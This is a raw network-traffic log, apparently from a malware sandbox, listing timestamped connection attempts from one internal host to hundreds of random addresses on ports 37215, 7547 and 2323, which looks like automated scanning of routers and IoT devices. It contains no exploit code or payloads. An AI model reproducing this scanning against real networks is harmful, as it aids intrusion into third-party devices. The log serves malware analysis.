                                          Nov 7, 2024 11:57:59.406229973 CET3070437215192.168.2.13156.139.173.142
                                          Nov 7, 2024 11:57:59.406250954 CET3070437215192.168.2.13156.241.76.124
                                          Nov 7, 2024 11:57:59.406250954 CET3070437215192.168.2.13156.113.114.179
                                          Nov 7, 2024 11:57:59.406256914 CET3070437215192.168.2.13156.160.5.74
                                          Nov 7, 2024 11:57:59.406261921 CET3070437215192.168.2.13156.213.142.143
                                          Nov 7, 2024 11:57:59.406261921 CET3070437215192.168.2.13156.76.37.254
                                          Nov 7, 2024 11:57:59.406280994 CET3070437215192.168.2.13156.115.136.106
                                          Nov 7, 2024 11:57:59.406284094 CET3070437215192.168.2.13156.222.209.51
                                          Nov 7, 2024 11:57:59.406296015 CET3070437215192.168.2.13156.71.46.212
                                          Nov 7, 2024 11:57:59.406296015 CET3070437215192.168.2.13156.31.35.55
                                          Nov 7, 2024 11:57:59.406296968 CET3070437215192.168.2.13156.96.135.156
                                          Nov 7, 2024 11:57:59.406307936 CET3070437215192.168.2.13156.214.48.6
                                          Nov 7, 2024 11:57:59.406308889 CET3070437215192.168.2.13156.86.250.107
                                          Nov 7, 2024 11:57:59.406326056 CET3070437215192.168.2.13156.146.27.141
                                          Nov 7, 2024 11:57:59.406327009 CET3070437215192.168.2.13156.80.84.175
                                          Nov 7, 2024 11:57:59.406332970 CET3070437215192.168.2.13156.218.235.1
                                          Nov 7, 2024 11:57:59.406357050 CET3070437215192.168.2.13156.255.112.157
                                          Nov 7, 2024 11:57:59.406374931 CET3070437215192.168.2.13156.213.221.215
                                          Nov 7, 2024 11:57:59.406374931 CET3070437215192.168.2.13156.62.247.51
                                          Nov 7, 2024 11:57:59.406375885 CET3070437215192.168.2.13156.83.227.157
                                          Nov 7, 2024 11:57:59.406383991 CET3070437215192.168.2.13156.106.74.5
                                          Nov 7, 2024 11:57:59.406392097 CET3070437215192.168.2.13156.133.250.245
                                          Nov 7, 2024 11:57:59.406392097 CET3070437215192.168.2.13156.205.80.153
                                          Nov 7, 2024 11:57:59.406409979 CET3070437215192.168.2.13156.138.58.194
                                          Nov 7, 2024 11:57:59.406409979 CET3070437215192.168.2.13156.145.143.200
                                          Nov 7, 2024 11:57:59.406423092 CET3070437215192.168.2.13156.145.216.97
                                          Nov 7, 2024 11:57:59.406430960 CET3070437215192.168.2.13156.244.216.173
                                          Nov 7, 2024 11:57:59.406434059 CET3070437215192.168.2.13156.122.190.178
                                          Nov 7, 2024 11:57:59.406435966 CET3070437215192.168.2.13156.244.102.71
                                          Nov 7, 2024 11:57:59.406438112 CET3070437215192.168.2.13156.228.132.186
                                          Nov 7, 2024 11:57:59.406450033 CET3070437215192.168.2.13156.55.20.101
                                          Nov 7, 2024 11:57:59.406467915 CET3070437215192.168.2.13156.55.7.190
                                          Nov 7, 2024 11:57:59.406491995 CET3070437215192.168.2.13156.130.22.223
                                          Nov 7, 2024 11:57:59.406518936 CET3070437215192.168.2.13156.34.92.209
                                          Nov 7, 2024 11:57:59.406518936 CET3070437215192.168.2.13156.183.205.19
                                          Nov 7, 2024 11:57:59.406518936 CET3070437215192.168.2.13156.238.182.114
                                          Nov 7, 2024 11:57:59.406519890 CET3070437215192.168.2.13156.152.161.200
                                          Nov 7, 2024 11:57:59.406518936 CET3070437215192.168.2.13156.217.211.29
                                          Nov 7, 2024 11:57:59.406522036 CET3070437215192.168.2.13156.166.26.2
                                          Nov 7, 2024 11:57:59.406524897 CET3070437215192.168.2.13156.148.175.20
                                          Nov 7, 2024 11:57:59.406529903 CET3070437215192.168.2.13156.88.71.22
                                          Nov 7, 2024 11:57:59.406531096 CET3070437215192.168.2.13156.137.28.195
                                          Nov 7, 2024 11:57:59.406531096 CET3070437215192.168.2.13156.68.141.132
                                          Nov 7, 2024 11:57:59.406541109 CET3070437215192.168.2.13156.6.6.195
                                          Nov 7, 2024 11:57:59.406546116 CET3070437215192.168.2.13156.77.143.8
                                          Nov 7, 2024 11:57:59.406553030 CET3070437215192.168.2.13156.210.141.165
                                          Nov 7, 2024 11:57:59.406579971 CET3070437215192.168.2.13156.116.104.102
                                          Nov 7, 2024 11:57:59.406582117 CET3070437215192.168.2.13156.23.188.238
                                          Nov 7, 2024 11:57:59.406582117 CET3070437215192.168.2.13156.251.88.36
                                          Nov 7, 2024 11:57:59.406583071 CET3070437215192.168.2.13156.214.38.141
                                          Nov 7, 2024 11:57:59.406585932 CET3070437215192.168.2.13156.248.194.206
                                          Nov 7, 2024 11:57:59.406596899 CET3070437215192.168.2.13156.232.40.18
                                          Nov 7, 2024 11:57:59.406598091 CET3070437215192.168.2.13156.16.133.124
                                          Nov 7, 2024 11:57:59.406610012 CET3070437215192.168.2.13156.112.22.186
                                          Nov 7, 2024 11:57:59.406611919 CET3070437215192.168.2.13156.146.249.139
                                          Nov 7, 2024 11:57:59.406610012 CET3070437215192.168.2.13156.169.85.63
                                          Nov 7, 2024 11:57:59.406630993 CET3070437215192.168.2.13156.132.3.21
                                          Nov 7, 2024 11:57:59.406631947 CET3070437215192.168.2.13156.64.138.50
                                          Nov 7, 2024 11:57:59.406632900 CET3070437215192.168.2.13156.149.239.204
                                          Nov 7, 2024 11:57:59.406632900 CET3070437215192.168.2.13156.123.103.195
                                          Nov 7, 2024 11:57:59.406650066 CET3070437215192.168.2.13156.134.8.206
                                          Nov 7, 2024 11:57:59.406652927 CET3070437215192.168.2.13156.37.234.181
                                          Nov 7, 2024 11:57:59.406652927 CET3070437215192.168.2.13156.109.71.159
                                          Nov 7, 2024 11:57:59.406665087 CET3070437215192.168.2.13156.217.161.131
                                          Nov 7, 2024 11:57:59.406666994 CET3070437215192.168.2.13156.219.143.187
                                          Nov 7, 2024 11:57:59.406677961 CET3070437215192.168.2.13156.49.172.130
                                          Nov 7, 2024 11:57:59.406678915 CET3070437215192.168.2.13156.20.86.251
                                          Nov 7, 2024 11:57:59.406681061 CET3070437215192.168.2.13156.84.170.92
                                          Nov 7, 2024 11:57:59.406683922 CET3070437215192.168.2.13156.228.100.103
                                          Nov 7, 2024 11:57:59.406687021 CET3070437215192.168.2.13156.127.119.199
                                          Nov 7, 2024 11:57:59.406687021 CET3070437215192.168.2.13156.113.161.193
                                          Nov 7, 2024 11:57:59.406707048 CET3070437215192.168.2.13156.222.36.107
                                          Nov 7, 2024 11:57:59.406711102 CET3070437215192.168.2.13156.86.179.143
                                          Nov 7, 2024 11:57:59.406713963 CET3070437215192.168.2.13156.240.247.98
                                          Nov 7, 2024 11:57:59.406733036 CET3070437215192.168.2.13156.29.66.170
                                          Nov 7, 2024 11:57:59.406738043 CET3070437215192.168.2.13156.113.103.63
                                          Nov 7, 2024 11:57:59.406744003 CET3070437215192.168.2.13156.215.195.156
                                          Nov 7, 2024 11:57:59.406744003 CET3070437215192.168.2.13156.127.189.8
                                          Nov 7, 2024 11:57:59.406760931 CET3070437215192.168.2.13156.81.140.11
                                          Nov 7, 2024 11:57:59.406764030 CET3070437215192.168.2.13156.92.153.50
                                          Nov 7, 2024 11:57:59.406764030 CET3070437215192.168.2.13156.6.192.64
                                          Nov 7, 2024 11:57:59.406780958 CET3070437215192.168.2.13156.171.211.49
                                          Nov 7, 2024 11:57:59.406784058 CET3070437215192.168.2.13156.102.118.223
                                          Nov 7, 2024 11:57:59.406785011 CET3070437215192.168.2.13156.175.2.199
                                          Nov 7, 2024 11:57:59.406791925 CET3070437215192.168.2.13156.24.221.214
                                          Nov 7, 2024 11:57:59.406791925 CET3070437215192.168.2.13156.60.136.117
                                          Nov 7, 2024 11:57:59.406795025 CET3070437215192.168.2.13156.67.148.253
                                          Nov 7, 2024 11:57:59.406806946 CET3070437215192.168.2.13156.142.174.250
                                          Nov 7, 2024 11:57:59.406806946 CET3070437215192.168.2.13156.28.163.215
                                          Nov 7, 2024 11:57:59.406820059 CET3070437215192.168.2.13156.206.102.225
                                          Nov 7, 2024 11:57:59.406826019 CET3070437215192.168.2.13156.162.46.22
                                          Nov 7, 2024 11:57:59.406826973 CET3070437215192.168.2.13156.201.230.224
                                          Nov 7, 2024 11:57:59.406831980 CET3070437215192.168.2.13156.225.145.98
                                          Nov 7, 2024 11:57:59.406831980 CET3070437215192.168.2.13156.227.229.251
                                          Nov 7, 2024 11:57:59.406845093 CET3070437215192.168.2.13156.161.14.58
                                          Nov 7, 2024 11:57:59.406860113 CET3070437215192.168.2.13156.79.48.0
                                          Nov 7, 2024 11:57:59.406883001 CET3070437215192.168.2.13156.87.47.254
                                          Nov 7, 2024 11:57:59.406883955 CET3070437215192.168.2.13156.166.73.16
                                          Nov 7, 2024 11:57:59.406893015 CET3070437215192.168.2.13156.246.251.67
                                          Nov 7, 2024 11:57:59.406905890 CET3070437215192.168.2.13156.209.114.187
                                          Nov 7, 2024 11:57:59.406907082 CET3070437215192.168.2.13156.32.204.198
                                          Nov 7, 2024 11:57:59.406908989 CET3070437215192.168.2.13156.45.218.90
                                          Nov 7, 2024 11:57:59.406908989 CET3070437215192.168.2.13156.154.190.164
                                          Nov 7, 2024 11:57:59.406908989 CET3070437215192.168.2.13156.162.169.254
                                          Nov 7, 2024 11:57:59.406922102 CET3070437215192.168.2.13156.41.87.227
                                          Nov 7, 2024 11:57:59.406945944 CET592507547192.168.2.1345.38.44.1
                                          Nov 7, 2024 11:57:59.406961918 CET3070437215192.168.2.13156.177.68.75
                                          Nov 7, 2024 11:57:59.406965017 CET3070437215192.168.2.13156.140.91.7
                                          Nov 7, 2024 11:57:59.406965971 CET3070437215192.168.2.13156.231.87.237
                                          Nov 7, 2024 11:57:59.406969070 CET3070437215192.168.2.13156.186.43.125
                                          Nov 7, 2024 11:57:59.406971931 CET3070437215192.168.2.13156.176.112.56
                                          Nov 7, 2024 11:57:59.406990051 CET3070437215192.168.2.13156.39.241.158
                                          Nov 7, 2024 11:57:59.406990051 CET3070437215192.168.2.13156.82.155.135
                                          Nov 7, 2024 11:57:59.406990051 CET3070437215192.168.2.13156.148.250.119
                                          Nov 7, 2024 11:57:59.407004118 CET3070437215192.168.2.13156.254.164.117
                                          Nov 7, 2024 11:57:59.407022953 CET3070437215192.168.2.13156.33.68.27
                                          Nov 7, 2024 11:57:59.407026052 CET3070437215192.168.2.13156.235.148.190
                                          Nov 7, 2024 11:57:59.407026052 CET3070437215192.168.2.13156.160.98.232
                                          Nov 7, 2024 11:57:59.407031059 CET3070437215192.168.2.13156.220.72.84
                                          Nov 7, 2024 11:57:59.407035112 CET3070437215192.168.2.13156.241.144.223
                                          Nov 7, 2024 11:57:59.407037973 CET3070437215192.168.2.13156.195.112.200
                                          Nov 7, 2024 11:57:59.407043934 CET3070437215192.168.2.13156.20.132.190
                                          Nov 7, 2024 11:57:59.407049894 CET3070437215192.168.2.13156.165.67.94
                                          Nov 7, 2024 11:57:59.407058954 CET3070437215192.168.2.13156.64.146.222
                                          Nov 7, 2024 11:57:59.407073021 CET3070437215192.168.2.13156.233.225.149
                                          Nov 7, 2024 11:57:59.407079935 CET3070437215192.168.2.13156.150.26.198
                                          Nov 7, 2024 11:57:59.407087088 CET3070437215192.168.2.13156.90.164.167
                                          Nov 7, 2024 11:57:59.407087088 CET3070437215192.168.2.13156.182.135.75
                                          Nov 7, 2024 11:57:59.407103062 CET3070437215192.168.2.13156.43.174.78
                                          Nov 7, 2024 11:57:59.407104969 CET3070437215192.168.2.13156.253.228.175
                                          Nov 7, 2024 11:57:59.407105923 CET3070437215192.168.2.13156.205.175.113
                                          Nov 7, 2024 11:57:59.407109022 CET3070437215192.168.2.13156.50.12.232
                                          Nov 7, 2024 11:57:59.407110929 CET3070437215192.168.2.13156.180.66.182
                                          Nov 7, 2024 11:57:59.407123089 CET3070437215192.168.2.13156.112.226.228
                                          Nov 7, 2024 11:57:59.407129049 CET3070437215192.168.2.13156.13.158.111
                                          Nov 7, 2024 11:57:59.407133102 CET3070437215192.168.2.13156.243.115.101
                                          Nov 7, 2024 11:57:59.407140017 CET3070437215192.168.2.13156.50.215.231
                                          Nov 7, 2024 11:57:59.407143116 CET3070437215192.168.2.13156.38.214.163
                                          Nov 7, 2024 11:57:59.407164097 CET3070437215192.168.2.13156.186.111.192
                                          Nov 7, 2024 11:57:59.407164097 CET3070437215192.168.2.13156.3.178.16
                                          Nov 7, 2024 11:57:59.407175064 CET3070437215192.168.2.13156.143.137.164
                                          Nov 7, 2024 11:57:59.407183886 CET3070437215192.168.2.13156.152.209.139
                                          Nov 7, 2024 11:57:59.407183886 CET3070437215192.168.2.13156.213.199.65
                                          Nov 7, 2024 11:57:59.407186031 CET3070437215192.168.2.13156.255.10.33
                                          Nov 7, 2024 11:57:59.407206059 CET3070437215192.168.2.13156.245.75.66
                                          Nov 7, 2024 11:57:59.407210112 CET3070437215192.168.2.13156.153.170.102
                                          Nov 7, 2024 11:57:59.407210112 CET3070437215192.168.2.13156.227.96.32
                                          Nov 7, 2024 11:57:59.407210112 CET3070437215192.168.2.13156.43.168.141
                                          Nov 7, 2024 11:57:59.407218933 CET3070437215192.168.2.13156.82.243.9
                                          Nov 7, 2024 11:57:59.407224894 CET3070437215192.168.2.13156.60.77.222
                                          Nov 7, 2024 11:57:59.407229900 CET3070437215192.168.2.13156.95.110.59
                                          Nov 7, 2024 11:57:59.407236099 CET3070437215192.168.2.13156.136.222.231
                                          Nov 7, 2024 11:57:59.407238960 CET3070437215192.168.2.13156.152.34.158
                                          Nov 7, 2024 11:57:59.407254934 CET3070437215192.168.2.13156.38.254.187
                                          Nov 7, 2024 11:57:59.407286882 CET3070437215192.168.2.13156.38.97.69
                                          Nov 7, 2024 11:57:59.407301903 CET3070437215192.168.2.13156.88.193.255
                                          Nov 7, 2024 11:57:59.407301903 CET3070437215192.168.2.13156.166.64.238
                                          Nov 7, 2024 11:57:59.407301903 CET3070437215192.168.2.13156.164.129.62
                                          Nov 7, 2024 11:57:59.407310009 CET3070437215192.168.2.13156.40.48.83
                                          Nov 7, 2024 11:57:59.407310009 CET3070437215192.168.2.13156.90.206.82
                                          Nov 7, 2024 11:57:59.407320023 CET3070437215192.168.2.13156.132.75.56
                                          Nov 7, 2024 11:57:59.407321930 CET3070437215192.168.2.13156.94.192.124
                                          Nov 7, 2024 11:57:59.407324076 CET3070437215192.168.2.13156.176.166.141
                                          Nov 7, 2024 11:57:59.407330036 CET3070437215192.168.2.13156.215.35.170
                                          Nov 7, 2024 11:57:59.407335043 CET3070437215192.168.2.13156.64.176.9
                                          Nov 7, 2024 11:57:59.407354116 CET3070437215192.168.2.13156.85.50.247
                                          Nov 7, 2024 11:57:59.407354116 CET3070437215192.168.2.13156.69.116.217
                                          Nov 7, 2024 11:57:59.407371044 CET3070437215192.168.2.13156.210.24.45
                                          Nov 7, 2024 11:57:59.407377005 CET3070437215192.168.2.13156.230.201.121
                                          Nov 7, 2024 11:57:59.407390118 CET3070437215192.168.2.13156.194.86.93
                                          Nov 7, 2024 11:57:59.407396078 CET3070437215192.168.2.13156.53.92.43
                                          Nov 7, 2024 11:57:59.407414913 CET3070437215192.168.2.13156.176.179.130
                                          Nov 7, 2024 11:57:59.407414913 CET3070437215192.168.2.13156.123.177.10
                                          Nov 7, 2024 11:57:59.407416105 CET3070437215192.168.2.13156.39.8.58
                                          Nov 7, 2024 11:57:59.407414913 CET3070437215192.168.2.13156.243.122.231
                                          Nov 7, 2024 11:57:59.407414913 CET3070437215192.168.2.13156.71.196.29
                                          Nov 7, 2024 11:57:59.407414913 CET3070437215192.168.2.13156.132.68.141
                                          Nov 7, 2024 11:57:59.407428026 CET3070437215192.168.2.13156.233.88.171
                                          Nov 7, 2024 11:57:59.407428980 CET3070437215192.168.2.13156.158.68.69
                                          Nov 7, 2024 11:57:59.407433033 CET3070437215192.168.2.13156.53.171.65
                                          Nov 7, 2024 11:57:59.407433033 CET3070437215192.168.2.13156.208.132.99
                                          Nov 7, 2024 11:57:59.407443047 CET3070437215192.168.2.13156.34.145.242
                                          Nov 7, 2024 11:57:59.407463074 CET3070437215192.168.2.13156.60.26.60
                                          Nov 7, 2024 11:57:59.407464981 CET3070437215192.168.2.13156.248.206.167
                                          Nov 7, 2024 11:57:59.407464981 CET3070437215192.168.2.13156.80.219.205
                                          Nov 7, 2024 11:57:59.407476902 CET3070437215192.168.2.13156.189.10.83
                                          Nov 7, 2024 11:57:59.407486916 CET3070437215192.168.2.13156.255.27.42
                                          Nov 7, 2024 11:57:59.407490015 CET3070437215192.168.2.13156.17.181.39
                                          Nov 7, 2024 11:57:59.407490015 CET3070437215192.168.2.13156.241.86.27
                                          Nov 7, 2024 11:57:59.407502890 CET3070437215192.168.2.13156.143.63.9
                                          Nov 7, 2024 11:57:59.407502890 CET3070437215192.168.2.13156.175.159.28
                                          Nov 7, 2024 11:57:59.407516003 CET3070437215192.168.2.13156.65.215.127
                                          Nov 7, 2024 11:57:59.407516956 CET3070437215192.168.2.13156.186.23.70
                                          Nov 7, 2024 11:57:59.407522917 CET3070437215192.168.2.13156.47.200.25
                                          Nov 7, 2024 11:57:59.407532930 CET3070437215192.168.2.13156.215.127.231
                                          Nov 7, 2024 11:57:59.407542944 CET3070437215192.168.2.13156.144.90.209
                                          Nov 7, 2024 11:57:59.407561064 CET3070437215192.168.2.13156.83.139.232
                                          Nov 7, 2024 11:57:59.407562017 CET3070437215192.168.2.13156.137.143.243
                                          Nov 7, 2024 11:57:59.407561064 CET3070437215192.168.2.13156.233.137.247
                                          Nov 7, 2024 11:57:59.407562017 CET3070437215192.168.2.13156.29.144.20
                                          Nov 7, 2024 11:57:59.407583952 CET3070437215192.168.2.13156.172.61.184
                                          Nov 7, 2024 11:57:59.407584906 CET3070437215192.168.2.13156.144.227.34
                                          Nov 7, 2024 11:57:59.407604933 CET3070437215192.168.2.13156.93.120.70
                                          Nov 7, 2024 11:57:59.407609940 CET3070437215192.168.2.13156.116.55.4
                                          Nov 7, 2024 11:57:59.407617092 CET3070437215192.168.2.13156.248.153.198
                                          Nov 7, 2024 11:57:59.407625914 CET3070437215192.168.2.13156.17.206.60
                                          Nov 7, 2024 11:57:59.407640934 CET3070437215192.168.2.13156.136.190.26
                                          Nov 7, 2024 11:57:59.407641888 CET3070437215192.168.2.13156.179.95.253
                                          Nov 7, 2024 11:57:59.407641888 CET3070437215192.168.2.13156.21.152.134
                                          Nov 7, 2024 11:57:59.407641888 CET3070437215192.168.2.13156.148.60.233
                                          Nov 7, 2024 11:57:59.407643080 CET3070437215192.168.2.13156.119.95.44
                                          Nov 7, 2024 11:57:59.407664061 CET3070437215192.168.2.13156.175.220.145
                                          Nov 7, 2024 11:57:59.407670021 CET3070437215192.168.2.13156.120.114.98
                                          Nov 7, 2024 11:57:59.407670021 CET3070437215192.168.2.13156.239.73.238
                                          Nov 7, 2024 11:57:59.407674074 CET3070437215192.168.2.13156.146.154.55
                                          Nov 7, 2024 11:57:59.407686949 CET3070437215192.168.2.13156.210.114.206
                                          Nov 7, 2024 11:57:59.407690048 CET3070437215192.168.2.13156.97.57.1
                                          Nov 7, 2024 11:57:59.407691956 CET3070437215192.168.2.13156.168.250.229
                                          Nov 7, 2024 11:57:59.407691956 CET3070437215192.168.2.13156.175.228.193
                                          Nov 7, 2024 11:57:59.407711029 CET3070437215192.168.2.13156.213.229.136
                                          Nov 7, 2024 11:57:59.407726049 CET3070437215192.168.2.13156.247.5.7
                                          Nov 7, 2024 11:57:59.407727003 CET3070437215192.168.2.13156.194.160.176
                                          Nov 7, 2024 11:57:59.407756090 CET3070437215192.168.2.13156.232.3.151
                                          Nov 7, 2024 11:57:59.407761097 CET3070437215192.168.2.13156.251.200.58
                                          Nov 7, 2024 11:57:59.407761097 CET3070437215192.168.2.13156.101.123.216
                                          Nov 7, 2024 11:57:59.407763958 CET3070437215192.168.2.13156.155.194.86
                                          Nov 7, 2024 11:57:59.407763958 CET3070437215192.168.2.13156.179.125.245
                                          Nov 7, 2024 11:57:59.407763958 CET3070437215192.168.2.13156.121.72.108
                                          Nov 7, 2024 11:57:59.407763958 CET3070437215192.168.2.13156.245.116.145
                                          Nov 7, 2024 11:57:59.407776117 CET3070437215192.168.2.13156.90.154.144
                                          Nov 7, 2024 11:57:59.407807112 CET3070437215192.168.2.13156.12.182.234
                                          Nov 7, 2024 11:57:59.407808065 CET3070437215192.168.2.13156.41.187.214
                                          Nov 7, 2024 11:57:59.407825947 CET3070437215192.168.2.13156.214.115.89
                                          Nov 7, 2024 11:57:59.407826900 CET3070437215192.168.2.13156.133.239.117
                                          Nov 7, 2024 11:57:59.407830954 CET3070437215192.168.2.13156.157.204.83
                                          Nov 7, 2024 11:57:59.407834053 CET3070437215192.168.2.13156.126.114.159
                                          Nov 7, 2024 11:57:59.407845974 CET3070437215192.168.2.13156.51.43.110
                                          Nov 7, 2024 11:57:59.407855988 CET3070437215192.168.2.13156.91.240.162
                                          Nov 7, 2024 11:57:59.407866955 CET3070437215192.168.2.13156.172.220.8
                                          Nov 7, 2024 11:57:59.407866955 CET3070437215192.168.2.13156.98.226.199
                                          Nov 7, 2024 11:57:59.407867908 CET3070437215192.168.2.13156.44.161.246
                                          Nov 7, 2024 11:57:59.407877922 CET3070437215192.168.2.13156.23.58.133
                                          Nov 7, 2024 11:57:59.407890081 CET3070437215192.168.2.13156.84.93.235
                                          Nov 7, 2024 11:57:59.407891989 CET3070437215192.168.2.13156.155.194.17
                                          Nov 7, 2024 11:57:59.407891989 CET3070437215192.168.2.13156.47.201.0
                                          Nov 7, 2024 11:57:59.407906055 CET3070437215192.168.2.13156.151.193.245
                                          Nov 7, 2024 11:57:59.407919884 CET3070437215192.168.2.13156.11.67.4
                                          Nov 7, 2024 11:57:59.407919884 CET3070437215192.168.2.13156.93.187.173
                                          Nov 7, 2024 11:57:59.407929897 CET3070437215192.168.2.13156.153.142.180
                                          Nov 7, 2024 11:57:59.407942057 CET3070437215192.168.2.13156.112.86.138
                                          Nov 7, 2024 11:57:59.407942057 CET3070437215192.168.2.13156.147.212.239
                                          Nov 7, 2024 11:57:59.407942057 CET3070437215192.168.2.13156.97.80.103
                                          Nov 7, 2024 11:57:59.407957077 CET3070437215192.168.2.13156.90.8.233
                                          Nov 7, 2024 11:57:59.407957077 CET3070437215192.168.2.13156.67.107.6
                                          Nov 7, 2024 11:57:59.407967091 CET3070437215192.168.2.13156.29.160.49
                                          Nov 7, 2024 11:57:59.407973051 CET3070437215192.168.2.13156.147.163.95
                                          Nov 7, 2024 11:57:59.407974005 CET3070437215192.168.2.13156.15.130.19
                                          Nov 7, 2024 11:57:59.407977104 CET3070437215192.168.2.13156.125.167.43
                                          Nov 7, 2024 11:57:59.407980919 CET3070437215192.168.2.13156.81.61.116
                                          Nov 7, 2024 11:57:59.407985926 CET3070437215192.168.2.13156.246.13.152
                                          Nov 7, 2024 11:57:59.407999039 CET3070437215192.168.2.13156.252.122.79
                                          Nov 7, 2024 11:57:59.407999039 CET3070437215192.168.2.13156.225.251.171
                                          Nov 7, 2024 11:57:59.408009052 CET3070437215192.168.2.13156.30.79.47
                                          Nov 7, 2024 11:57:59.408016920 CET3070437215192.168.2.13156.253.150.248
                                          Nov 7, 2024 11:57:59.408016920 CET3070437215192.168.2.13156.177.159.75
                                          Nov 7, 2024 11:57:59.408031940 CET3070437215192.168.2.13156.207.150.255
                                          Nov 7, 2024 11:57:59.408031940 CET3070437215192.168.2.13156.6.191.18
                                          Nov 7, 2024 11:57:59.408031940 CET3070437215192.168.2.13156.110.229.23
                                          Nov 7, 2024 11:57:59.408046007 CET3070437215192.168.2.13156.176.105.246
                                          Nov 7, 2024 11:57:59.408047915 CET3070437215192.168.2.13156.20.59.58
                                          Nov 7, 2024 11:57:59.408047915 CET3070437215192.168.2.13156.238.48.64
                                          Nov 7, 2024 11:57:59.408070087 CET3070437215192.168.2.13156.39.206.180
                                          Nov 7, 2024 11:57:59.408071041 CET3070437215192.168.2.13156.73.46.147
                                          Nov 7, 2024 11:57:59.408071041 CET3070437215192.168.2.13156.17.186.133
                                          Nov 7, 2024 11:57:59.408075094 CET3070437215192.168.2.13156.213.195.176
                                          Nov 7, 2024 11:57:59.408078909 CET3070437215192.168.2.13156.51.135.64
                                          Nov 7, 2024 11:57:59.408081055 CET3070437215192.168.2.13156.153.166.35
                                          Nov 7, 2024 11:57:59.408086061 CET3070437215192.168.2.13156.60.184.140
                                          Nov 7, 2024 11:57:59.408107996 CET3070437215192.168.2.13156.78.53.112
                                          Nov 7, 2024 11:57:59.408107996 CET3070437215192.168.2.13156.103.221.216
                                          Nov 7, 2024 11:57:59.408108950 CET3070437215192.168.2.13156.241.167.134
                                          Nov 7, 2024 11:57:59.408108950 CET3070437215192.168.2.13156.66.45.27
                                          Nov 7, 2024 11:57:59.408118010 CET3070437215192.168.2.13156.128.44.129
                                          Nov 7, 2024 11:57:59.408121109 CET3070437215192.168.2.13156.199.251.60
                                          Nov 7, 2024 11:57:59.408123016 CET3070437215192.168.2.13156.47.157.43
                                          Nov 7, 2024 11:57:59.408130884 CET3070437215192.168.2.13156.180.255.178
                                          Nov 7, 2024 11:57:59.408130884 CET3070437215192.168.2.13156.243.180.98
                                          Nov 7, 2024 11:57:59.408130884 CET3070437215192.168.2.13156.168.206.177
                                          Nov 7, 2024 11:57:59.408130884 CET3070437215192.168.2.13156.22.51.198
                                          Nov 7, 2024 11:57:59.408147097 CET3070437215192.168.2.13156.210.1.132
                                          Nov 7, 2024 11:57:59.408152103 CET3070437215192.168.2.13156.7.200.33
                                          Nov 7, 2024 11:57:59.408153057 CET3070437215192.168.2.13156.179.150.142
                                          Nov 7, 2024 11:57:59.408171892 CET335202323192.168.2.13167.107.178.16
                                          Nov 7, 2024 11:57:59.408171892 CET3070437215192.168.2.13156.236.217.58
                                          Nov 7, 2024 11:57:59.408175945 CET3070437215192.168.2.13156.58.14.157
                                          Nov 7, 2024 11:57:59.408193111 CET3070437215192.168.2.13156.51.145.5
                                          Nov 7, 2024 11:57:59.408200979 CET3070437215192.168.2.13156.197.210.113
                                          Nov 7, 2024 11:57:59.408205986 CET3070437215192.168.2.13156.69.202.92
                                          Nov 7, 2024 11:57:59.408205986 CET3070437215192.168.2.13156.173.135.29
                                          Nov 7, 2024 11:57:59.408207893 CET3070437215192.168.2.13156.133.122.223
                                          Nov 7, 2024 11:57:59.408210039 CET3070437215192.168.2.13156.79.233.238
                                          Nov 7, 2024 11:57:59.408217907 CET3070437215192.168.2.13156.99.7.128
                                          Nov 7, 2024 11:57:59.408217907 CET3070437215192.168.2.13156.27.116.103
                                          Nov 7, 2024 11:57:59.408224106 CET3070437215192.168.2.13156.114.212.105
                                          Nov 7, 2024 11:57:59.408230066 CET3070437215192.168.2.13156.116.23.200
                                          Nov 7, 2024 11:57:59.408231974 CET3070437215192.168.2.13156.244.165.85
                                          Nov 7, 2024 11:57:59.408232927 CET3070437215192.168.2.13156.191.148.9
                                          Nov 7, 2024 11:57:59.408241034 CET3070437215192.168.2.13156.13.163.225
                                          Nov 7, 2024 11:57:59.408253908 CET3070437215192.168.2.13156.69.98.41
                                          Nov 7, 2024 11:57:59.408255100 CET3070437215192.168.2.13156.63.58.79
                                          Nov 7, 2024 11:57:59.408282042 CET3070437215192.168.2.13156.187.34.131
                                          Nov 7, 2024 11:57:59.408282042 CET3070437215192.168.2.13156.112.206.169
                                          Nov 7, 2024 11:57:59.408294916 CET3070437215192.168.2.13156.216.69.11
                                          Nov 7, 2024 11:57:59.408294916 CET3070437215192.168.2.13156.136.111.202
                                          Nov 7, 2024 11:57:59.408303022 CET3070437215192.168.2.13156.163.31.200
                                          Nov 7, 2024 11:57:59.408303976 CET7547305694.49.150.160192.168.2.13
                                          Nov 7, 2024 11:57:59.408318043 CET3070437215192.168.2.13156.84.102.68
                                          Nov 7, 2024 11:57:59.408324957 CET75473056202.125.197.93192.168.2.13
                                          Nov 7, 2024 11:57:59.408335924 CET75473056128.175.136.239192.168.2.13
                                          Nov 7, 2024 11:57:59.408337116 CET3070437215192.168.2.13156.78.106.15
                                          Nov 7, 2024 11:57:59.408337116 CET3070437215192.168.2.13156.6.162.20
                                          Nov 7, 2024 11:57:59.408338070 CET3070437215192.168.2.13156.27.133.106
                                          Nov 7, 2024 11:57:59.408345938 CET3070437215192.168.2.13156.97.119.146
                                          Nov 7, 2024 11:57:59.408346891 CET7547305689.19.150.19192.168.2.13
                                          Nov 7, 2024 11:57:59.408358097 CET75473056148.184.214.228192.168.2.13
                                          Nov 7, 2024 11:57:59.408358097 CET30567547192.168.2.13128.175.136.239
                                          Nov 7, 2024 11:57:59.408368111 CET7547305635.104.254.188192.168.2.13
                                          Nov 7, 2024 11:57:59.408376932 CET30567547192.168.2.1389.19.150.19
                                          Nov 7, 2024 11:57:59.408377886 CET3070437215192.168.2.13156.72.66.232
                                          Nov 7, 2024 11:57:59.408377886 CET30567547192.168.2.1394.49.150.160
                                          Nov 7, 2024 11:57:59.408379078 CET30567547192.168.2.13202.125.197.93
                                          Nov 7, 2024 11:57:59.408386946 CET30567547192.168.2.13148.184.214.228
                                          Nov 7, 2024 11:57:59.408387899 CET7547305696.154.119.97192.168.2.13
                                          Nov 7, 2024 11:57:59.408395052 CET30567547192.168.2.1335.104.254.188
                                          Nov 7, 2024 11:57:59.408399105 CET7547305682.201.250.49192.168.2.13
                                          Nov 7, 2024 11:57:59.408406019 CET3070437215192.168.2.13156.156.82.105
                                          Nov 7, 2024 11:57:59.408416986 CET7547305613.3.251.227192.168.2.13
                                          Nov 7, 2024 11:57:59.408427000 CET75473056121.90.41.114192.168.2.13
                                          Nov 7, 2024 11:57:59.408437014 CET30567547192.168.2.1382.201.250.49
                                          Nov 7, 2024 11:57:59.408440113 CET3070437215192.168.2.13156.220.61.200
                                          Nov 7, 2024 11:57:59.408440113 CET3070437215192.168.2.13156.9.122.44
